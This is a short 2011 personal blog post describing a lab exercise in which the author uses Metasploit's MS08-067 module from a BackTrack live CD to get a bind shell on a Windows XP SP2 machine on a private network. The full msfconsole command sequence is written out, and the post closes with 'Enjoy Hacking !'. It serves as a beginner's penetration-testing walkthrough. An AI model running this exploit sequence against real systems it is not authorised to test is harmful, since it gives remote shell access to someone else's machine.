Friday, August 19, 2011

First experience of windows xp hacking

From last few days i have been working with snort (Intrusion Detection System ) to make network more secure. To test snort setup i used Metasploit tool. Between this i decided to test my skill on metasploit by hacking a windows xp system Since i am using Backtrack live cd i found metasploit in directory /pentest/exploits/framework3, there i found program msfconsole


root# cd /pentest/exploits/framework3

root#./msfconsole

Now i am inside metasploit

msf>

I used following command to hack a windows xp system (sp2) with ip 192.168.1.5 from my system (192.168.1.3) , inside metasploit

msf> use windows/smb/ms08_067_netapi

msf> show options

msf> set RHOST 192.168.1.5

msf>set LHOST 192.168.1.3

msf>set PAYLOAD generic/shell_bind_tcp

msf>exploit

After that exploit start with gave me message that a seesion created. Cheers i hacked a windows, it was so easy. One thing is also important here that for movement between sessions we can use

msf> sessions -i 1

Hacking is really fun but its really not good that windows systems are so vulnerable.
Enjoy Hacking !
Helpful links are http://www.metasploit.com/, http://www.backtrack-linux.org/